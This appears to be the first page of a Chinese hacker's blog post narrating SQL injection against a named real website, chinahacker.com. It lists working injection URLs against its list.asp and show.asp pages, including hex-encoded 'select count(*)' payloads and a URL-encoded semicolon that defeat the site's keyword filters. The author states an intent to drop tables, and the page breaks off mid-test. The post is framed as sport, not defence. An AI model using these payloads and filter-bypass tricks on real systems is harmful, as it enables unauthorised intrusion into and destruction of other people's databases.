帮黑夜找一个工具，又去了黑客基地看了一眼，我晕，又是枫三少的照片挂在上面(n年前就是这样了，三少，挂照片好爽?^-^)，我倒!看看黑基有什么注入漏洞先。我找啊找，找到了论坛。看到一个叫《[原创]对中国黑客联盟的二次渗透》，是某人写的。我直觉告诉我，这个什么中国黑客联盟应该还有漏洞(别丢鸡蛋，我很少去这样的站)。已经被人黑了2次了，也不差我了吧。我再来!

　　地址

　　http://www.chinahacker.com/article/list.asp?id=891

　　测试开始吧。

　　测试一：

　　http://www.chinahacker.com/article/list.asp?id=891’

　　返回：你提交的数据有错，不要老喜欢搞我啦，Kender留言

　　个人判断：过滤了’

　　测试二：

　　http://www.chinahacker.com/article/list.asp?id=891%20and%201=1

　　返回：正常

　　个人判断：应该可以去死了，只过滤了’。

　　而且是mssql的数据库，我最喜欢。然后我想可能还过滤了select之类的吧。这次真是好玩。我想了想用16进制，这里我用了一个工具，是裤衩写的HEXSQL。由于枫三少已经写了有article表了，我是一个很懒的人。提交如下：

　　http://www.chinahacker.com/article/list.asp?id=891%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30

　　其实就是

　　http://www.chinahacker.com/article/list.asp?id=891 and (select count(*) from article)>0

　　返回正常，我是个很喜欢drop表的人来的。看看;能不能先

　　http://www.chinahacker.com/article/list.asp?id=891;

　　oh，shit，过滤了。再来一下先。

　　http://www.chinahacker.com/article/list.asp?id=891%3B，又可以了。

　　提醒黑客联盟一下吧。这里更好玩!

　　http://www.chinahacker.com/soft/show.asp?id=401%20and%20%28%73%65%6C%65%63%74%20%63%6F%75%6E%74%28%2A%29%20%46%72%6F%6D%20%61%72%74%69%63%6C%65%29%3E%30

　　玩认真的了。

　　连接用户：

　　%20and%20%75%73%65%72%3E%30代表 and user>0

　　返回

[1] [2] 下一页